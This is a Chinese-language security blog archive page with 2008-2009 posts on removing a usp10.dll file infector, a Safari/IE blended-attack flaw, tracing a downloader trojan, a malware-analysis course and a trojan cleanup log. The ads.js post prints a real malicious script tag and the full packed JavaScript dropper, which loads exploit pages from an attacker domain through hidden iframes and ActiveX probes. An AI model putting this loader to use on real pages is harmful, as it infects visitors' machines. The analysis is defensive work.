Category Archives: 病毒学习

关于病毒的研究,病毒技术文档收藏,病毒的教程资料

挂彩usp10.dll垃圾 不完全清理办法

Posted on March 16, 2009 by 白菜林

系统中有个usp10.dll(WINDOWS\system32\USP10.dll),发现在其他目录下的usp10.dll就可以确定程序”.exe”文件被感染啦。 由于偶先前做过备份,就直接恢复系统,然后通过安装在系统盘下的360进行啦查杀!100多号文件夹下都有这东东,直接强力查杀即可ok。 若是没有备份系统,又想清理usp10.dll,可尝试打开”我的电脑”选择菜单栏里的”工具”下的”文件夹选项”选择”隐藏受保护的操作系统文件”和”显示所有文件和文件夹”,这样做是因为这个USP10.dll病毒把自身修改为系统文件和隐藏文件,这样做后就可以看到USP10.dll病毒文件了.USP10.dll病毒会感染系统里所有exe文件,并切把自身复制到被感染的exe文件的当前目录。到安全模式去删除病毒,在安全模式下,”开始菜单”选择”搜索”再选择”文件或文件夹”在”全部或部分文件名”里写上”usp10.dll”,然后直接点”搜索”,系统会搜索出所有盘符下的USP10.dll病毒出来,注意路径,C:\WINDOWS\system32\USP10.dll和C:\WINDOWS\system32\dllcache\USP10.dll的不是病毒,其他的都是,等把所有usp10.dll搜索出来后,就删除,C:\WINDOWS\USP10.dll可能一时删不了,这个也是病毒,只是还有进程在使用他,我们可以先给他改个名字,重命名一下,只要不是usp10.dll就可以,然后重新启动,再回到C:\WINDOWS\把你刚改的名字的病毒删掉就可以了.但是被感染的exe还没有恢复,这样没有完全把的病毒全面清理掉,还是要依靠专杀工具或杀毒软件来修复exe文件。囧 上边这个搜索删除办法参考自:http://iask.sina.com.cn/b/13260913.html?from=zzsy03

Posted in 病毒学习 | Tagged | Leave a comment

Safari for windows默认配置+ie浏览器——>木马作者的天堂

Posted on June 11, 2008 by 白菜林

Nitesh Dhanjani 发现的这个(windows版的safari浏览器在不经用户确认的情况下把文件下载到用户桌面)漏洞。标题为”Safari Carpet Bomb”的介绍可以在Nitesh Dhanjani博客看到,接着微软就发出一份(标题为:Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform)“安全公告”。Aviv Raff在他的博客发表“Safari pwns Internet Explorer”澄清这个(MS)漏洞早在2006年就已经报告过。 关于这个混合Safari和IE漏洞攻击的分析 这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述”Internet Explorer 7 – Still Spyware Writers Heaven“,和”IE7 DLL-load hijacking Code Execution Exploit PoC” 漏洞演示代码可以在”milw0rm”找到。 这个漏洞主要出在:ie(Windows Internet … Continue reading

Posted in 今日一点, 漏洞, 病毒学习 | Tagged , , | Leave a comment

explorer.exe下载者病毒行为跟踪

Posted on May 30, 2008 by 白菜林

得到样本,打开虚拟机,先到http://www.virustotal.com/分析一下情况: 文件 explorer.exe 接收于 2008.05.29 16:26:52 (CET) 反病毒引擎 版本 最后更新 扫描结果</td AhnLab-V3 2008.5.29.0 2008.05.29 -</td AntiVir 7.8.0.19 2008.05.29 TR/Downloader.Gen</td Authentium 5.1.0.4 2008.05.28 W32/Agent.L.gen!Eldorado</td Avast 4.8.1195.0 2008.05.29 Win32:Agent-XEY</td AVG 7.5.0.516 2008.05.29 KillAV.JR</td BitDefender 7.2 2008.05.29 Generic.Malware.Bdld.2B3CEAD5</td CAT-QuickHeal 9.50 2008.05.28 TrojanDownloader.Zlob.ww</td ClamAV … Continue reading

Posted in 今日一点, 病毒学习 | Tagged , , , , | Leave a comment

病毒分析技术课程PDF版本

Posted on May 12, 2008 by 白菜林

F-Secure推出的病毒分析课程并提供了PDF版本教材下载,对病毒分析技术感兴趣的朋友可以看看!e文,课程下载地址:http://www.tml.tkk.fi/Opinnot/T-110.6220/2008/ Course information The course teaches students what malicious code is and how it can be detected and analyzed. Topics of the course include malware taxonomy, reverse engineering, code emulation fundamentals, basic cryptoanalysis of malicious crypto, and antivirus engine basics. … Continue reading

Posted in 推荐,内容, 病毒学习 | Tagged , , | Leave a comment

ads.js新变种(err.www404.cn:53/ads.js)?又是百度

Posted on May 6, 2008 by 白菜林

这个地址是在telnet百度的时候发现的: <script language=”javascript” SRC=”http://err.www404.cn:53/ads.js”></script> 把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。 ads.js源码: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘A B(){}f.L=B;b(4.t.G(\’s\’)==-1){z()}A z(){2 p=”Q:N”+”Y”+”-Z-V”;2 y=”0-R”+”-10″;2 v=p+y;2 9=”[x O]“;h{2 e;2 w=(4["P"+"U"](“x”));w["X"](“W”,v);f["E"]["D"](“C”+”F.”+”S”+”M”+”e”+”K”,””)}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\’s=1s;1n=/;a=\’+a.1j();4.8(“<r 1l=1k:1h 6=7://d.c.5/1m.g></r>”);4.8(“<3 6=7://d.c.5/11.g></3>”);b(e!=9){}1r{h{2 1q=i f["l"](“1o.1p”);2 n}k(n){};j{b(n!=9){4.8(“<3 6=7://d.c.5/1i.g><\\/3>”)}}h{2 q=i f["l"](“1g”+”16.17″+”15.1″);2 m}k(m){};j{b(m!=9){4.8(“<3 6=7://d.c.5/q.g><\\/3>”)}}h{2 14=i f["l"](“12″+”13.I”+”18.1″);2 o}k(o){};j{b(o!=9){4.8(“<3 6=7://d.c.5/19.g><\\/3>”)}}}}}4.8(“<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>”);’,62,91,’||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely’.split(‘|’),0,{})) ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么): function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf(‘MyCookie’)==-1){exit()}function … Continue reading

Posted in 今日一点, 病毒学习 | Tagged , , , , | Leave a comment

u.asdafdgfgf.com不完全查杀记录『Fax 2Client为你带来的礼物』

Posted on April 22, 2008 by 白菜林

好不容易抓到个中奖的机子(其他机子都打补丁啦,就有两个没打过补丁!!后来挪进来的机子) 360安全卫士木马查杀历史报告 木马名称:恶意干扰对象 路径:C:\WINDOWS\DOWNLO~1\405.exe 查杀时间 :2008-04-21 20:17 木马名称:伪Honey木马下载器 路径:C:\PROGRA~1\COMMON~1\CPUSH\cpush.dll 查杀时间 :2008-04-21 20:17 木马名称:Weiyuan木马程序 路径:C:\windows\system32\weiyuan.exe 查杀时间 :2008-04-21 20:17 木马名称:PWL.LMir木马程序 路径:C:\WINDOWS\system32\inf\svch0st.exe 查杀时间 :2008-04-21 20:17 木马名称:伪linkinfo恶意程序 路径:C:\WINDOWS\linkinfo.dll 查杀时间 :2008-04-21 20:17 木马名称:Trojan/Win32.Rodog.sua 路径:C:\Program Files\Common Files\CPUSH\Uninst.exe 查杀时间 :2008-04-21 20:17 木马名称:Trojan/Win32.Rodog.aza 路径:C:\Documents and Settings\Admin\桌面\Microsoft.exe 查杀时间 :2008-04-21 … Continue reading

Posted in 今日一点, 病毒学习 | Tagged , , , | Leave a comment